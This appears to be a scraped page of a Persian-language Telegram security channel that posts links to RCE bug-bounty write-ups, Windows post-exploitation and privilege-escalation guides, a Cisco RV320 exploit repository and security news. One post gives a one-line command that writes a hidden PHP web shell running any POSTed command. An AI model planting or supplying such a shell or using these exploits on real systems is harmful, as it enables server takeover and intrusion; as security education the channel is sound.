امنیت اطلاعات

مجموعه رایت آپ های مرتبط با کشف RCE در شرکت های بزرگ

https://sites.google.com/site/testsitehacking/-36k-google-app-engine-rce

https://thehackerblog.com/i-too-like-to-live-dangerously-accidentally-finding-rce-in-signal-desktop-via-html-injection-in-quoted-replies/index.html

https://www.sec-down.com/wordpress/?p=87

https://pwnrules.com/flickr-from-sql-injection-to-rce/

https://pentester.land/list-of-bug-bounty-writeups.html

https://medium.com/bugbountywriteup/how-i-got-5500-from-yahoo-for-rce-92fffb7145e6

https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a

https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

https://matatall.com/xss/rce/bugbounty/2015/09/08/xss-to-rce.html

https://ysx.me.uk/taking-note-xss-to-rce-in-the-simplenote-electron-client/

https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/

https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/

https://medium.com/bugbountywriteup/rocet-remote-code-execution-tool-11efa54654d5

https://medium.com/bugbountywriteup/how-an-instagrams-story-drives-me-to-a-remote-code-execution-9ff96458ec89

https://www.contextis.com/en/blog/frag-grenade-a-remote-code-execution-vulnerability-in-the-steam-client

https://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution

https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1

#rce
#web
#pentest
#writeup
#bugbounty

@sec_nerd

487 viewsedited 19:32

امنیت اطلاعات

This media is not supported in your browser

VIEW IN TELEGRAM

آسیب پذیری 0day در apt که منجر به اجرای دستور از راه دور در سیستم های لینوکسی میشود

شناسه : CVE-2019-3462

https://justi.cz/security/2019/01/22/apt-rce.html

#linux
#debian
#rce

@sec_nerd

514 views19:37

امنیت اطلاعات

Hidden #WebShell

echo -e "<?=\`\$_POST[1]\`?>\r<?='PHP Test';?>" > test.php

#php
#web

@sec_nerd

519 views19:41

امنیت اطلاعات

تبریک به مدیران و دست اندرکاران وبسایت آپارات که موفق شدن وارد صد سایت برتر رده بندی جهانی از دید الکسا بشن!

بها دادن به سرویس های وطنی اونطور که بعضی ها در برابرش جبهه گیری میکنن هم بد نیست.

آپارات یک نمونه خوب و موفق هست که نشانه ی خوبی از بی اساس بودن تحلیلهای برخی افراد هست.

https://www.alexa.com/siteinfo/aparat.com

#aparat
#iran
#alexa

@sec_nerd

444 viewsedited 19:48

امنیت اطلاعات

دور زدن محدودیت های شبکه با استفاده از RDP

https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html

#rdp
#windowns
#pentest
#privesc
#network

@sec_nerd

375 views17:45

امنیت اطلاعات

رایت آپ دور زدن احراز هویت دومرحله ای (گوگل، مایکروسافت، اینستاگرام، کلودفلر....)

https://medium.com/@lukeberner/how-i-abused-2fa-to-maintain-persistence-after-a-password-change-google-microsoft-instagram-7e3f455b71a1

#writeup
#google
#2fa
#instagram

@sec_nerd

Medium

How I abused 2FA to maintain persistence after a password change (Google, Microsoft, Instagram, Cloudflare, etc)

TL;DR: Waiting in the 2FA page could allow you to log in without knowing the current password in many major websites.

465 views18:07

امنیت اطلاعات

رایت آپ اکسپلویت کردن آسیب پذیری RCE و خواندن فایل های لوکال در Magento

https://blog.scrt.ch/2019/01/24/magento-rce-local-file-read-with-low-privilege-admin-rights/

#web
#pentest
#magento
#rce

@sec_nerd

322 viewsedited 18:16

امنیت اطلاعات

هکرها در حال انتشار باج افزار GandCrab و ویروس Ursnif با استفاده از داکیومنت های آفیس هستند!
این داکیومنت ها با استفاده از ایمیل های فیشینگ برای قربانیان ارسال میشوند.
باج افزار GandCrab یکی از فعالترین کمپین های باج افزاری دنیا را در اختیار دارد که تاکنون چندین نسخه از آن توسط مالکانش مورد استفاده قرار گرفته است.
اما ویروس Ursnif که ممکن است کمتر در مورد آن شنیده باشید، یک ویروس سارق دیتاست که پس از اجرا، اقدام به جمع آوری اطلاعات و ارسال آن به سرور کنترل کننده میکند.

اطلاعات بیشتر:
https://thehackernews.com/2019/01/microsoft-gandcrab-ursnif.html

#news
#ransomware
#gandcrab
#windows

@sec_nerd

534 views18:32

امنیت اطلاعات

Forwarded from Information Security

Windows2019 Bypass UAC and Defender to get system permissions

https://youtu.be/sJvDxh63Ptg

YouTube

Windows2019 Bypass UAC and Defender to get system permissions

20 views18:33

امنیت اطلاعات

عملیات پسانفوذ در ویندوز با استفاده از WMIC

https://www.hackingarticles.in/post-exploitation-using-wmic-system-command/

#windows
#post_exploit
#pentest
#privesc

@sec_nerd

328 views18:41

امنیت اطلاعات

فعال کردن WDigest برای استخراج پسورد کاربران ویندوز از حافظه https://www.trustedsec.com/2015/04/dumping-wdigest-creds-with-meterpreter-mimikatzkiwi-in-windows-8-1/ مرتبط: https://github.com/gentilkiwi/mimikatz/issues/40#issuecomment-220830921 #windows…

راه حل جلوگیری از استخراج پسوردها از حافظه ی wdigest که توسط mimikatz و crackmapexec انجام میشود

https://p16.praetorian.com/blog/mitigating-mimikatz-wdigest-cleartext-credential-theft

#windows
#security
#mimikatz
#privesc

@sec_nerd

440 views18:47

امنیت اطلاعات

لیست دستورات مفید پس از نفوذ به ماشین ویندوزی

https://medium.com/@int0x33/day-26-the-complete-list-of-windows-post-exploitation-commands-no-powershell-999b5433b61e

#post_exploit
#windows
#privesc
#enum

@sec_nerd

Medium

Day 26: The Complete List of Windows Post-Exploitation Commands (No Powershell)

I WAS VERY PUSHED FOR TIME TODAY, I HAVE A LOT MORE TO ADD SO PLEASE KEEP CHECKING AS THIS WILL GROW AND GROW! I will also try and…

393 views18:51

امنیت اطلاعات

Remote NTLM relaying through meterpreter on Windows port 445

https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/

#windows
#smb
#ntlm
#pentest

@sec_nerd

343 views18:53

امنیت اطلاعات

سوء استفاده از سرور Exchange برای رسیدن به سطح دسترسی ادمین دامین

https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/

#windows
#privesc
#exchange
#pentest

@sec_nerd

317 views18:49

امنیت اطلاعات

روش های کشف و اکسپلویت کردن آسیب پذیری SSRF

https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978

https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0

https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-3-b0f5997e3739

#web
#pentest
#ssrf

@sec_nerd

Medium

SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1

(Please ignore mistakes if any!)

378 views18:53

امنیت اطلاعات

unc0ver

The most advanced jailbreak tool

unc0ver jailbreak for iOS 11.0 - 11.4b3

https://github.com/pwn20wndstuff/Undecimus/releases

#ios
#apple
#jailbreak

@sec_nerd

GitHub

Releases · pwn20wndstuff/Undecimus

unc0ver jailbreak for iOS 11.0 - 12.4. Contribute to pwn20wndstuff/Undecimus development by creating an account on GitHub.

343 views19:09

امنیت اطلاعات

وبسایتهای وردپرسی تحت حمله هکرها!
اخیرا هکرها با کشف آسیب پذیری در پلاگین Total Donations اقدام به نفوذ به وبسایتهای وردپرسی میکنند.
از ادمین ها خواسته شده تا اطلاع ثانوی این پلاگین را حذف کنند زیرا هنوز آپدیتی برای آن منتشر نشده است.
این آسیب پذیری به هکرها اجازه میدهد هر تنظیمی از هسته وردپرس یا پلاگین ها و یا مقصد پرداختهای این پلاگین را نیز تغییر دهند.

اطلاعات بیشتر:

https://www.zdnet.com/article/wordpress-sites-under-attack-via-zero-day-in-abandoned-plugin/

#news
#wp
#wordpress
#exploit

@sec_nerd

ZDNET

WordPress sites under attack via zero-day in abandoned plugin

Developers of Total Donations plugin have gone missing, leaving former customers open to attacks.

424 views19:17

امنیت اطلاعات

اکسپلویت جدید مربوط به Cisco RV320 وRV325 که منجر به اجرای دستور در روترهای وی پی ان میشود

https://github.com/0x27/CiscoRV320Dump

#exploit
#network
#cisco
#rce

@sec_nerd

GitHub

GitHub - 0x27/CiscoRV320Dump: CVE-2019-1652 /CVE-2019-1653 Exploits For Dumping Cisco RV320 Configurations & Debugging Data AND…

CVE-2019-1652 /CVE-2019-1653 Exploits For Dumping Cisco RV320 Configurations & Debugging Data AND Remote Root Exploit! - 0x27/CiscoRV320Dump

343 views18:37

امنیت اطلاعات

نکات تست نفوذ اینترانت

https://github.com/Ridter/Intranet_Penetration_Tips

(زبان چینی)

#network
#pentest
#windows
#linux
#privesc

@sec_nerd

GitHub

GitHub - Ridter/Intranet_Penetration_Tips: 2018年初整理的一些内网渗透TIPS，后面更新的慢，所以整理出来希望跟小伙伴们一起更新维护~

2018年初整理的一些内网渗透TIPS，后面更新的慢，所以整理出来希望跟小伙伴们一起更新维护~. Contribute to Ridter/Intranet_Penetration_Tips development by creating an account on GitHub.

294 views18:53

امنیت اطلاعات

0:17

This media is not supported in your browser

VIEW IN TELEGRAM

ویدیوی اثبات آسیب پذیری FaceTime که به تماس گیرنده امکان شنیدن صدای اطراف و دیدن تصویر را بدون اینکه طرف مقابل پاسخ تماس را بدهد، میدهد.

#apple
#facetime
#exploit

@sec_nerd

281 views18:55

امنیت اطلاعات

وب سایت https://webstresser.org که به ارائه خدمات DDOS در اینترنت شهرت داشت، با همکاری پلیس کشورهای کانادا، هلند، بریتانیا، صربستان، کرواسی، اسپانیا، ایتالیا، آلمان، استرالیا، هنگ کنگ، امریکا و اینترپل این وبسایت با حکم دادگاه شرقی ویرجینیا، توسط دپارتمان دفاع…

پس از اینکه سال گذشته وبسایت webstresser.org توسط پلیس اروپا مصادره و عوامل آن دستگیر شدند، حالا یوروپل حسابهای بیش از ۱۵۱ هزار نفر که در این وبسایت ثبت نام کرده و خدمات DDOS دریافت کرده بودند را بدست آورده و بیش از ۲۵۰ نفر از آنان تحت تعقیب قرار گرفته اند!

تاکنون چندین یوزر این وبسایت به ادارات پلیس احضار شده اند.

https://thehackernews.com/2019/01/ddos-for-hire-services.html

#news
#ddos
#europe

@sec_nerd

276 viewsedited 19:01

About

Blog

Apps

Platform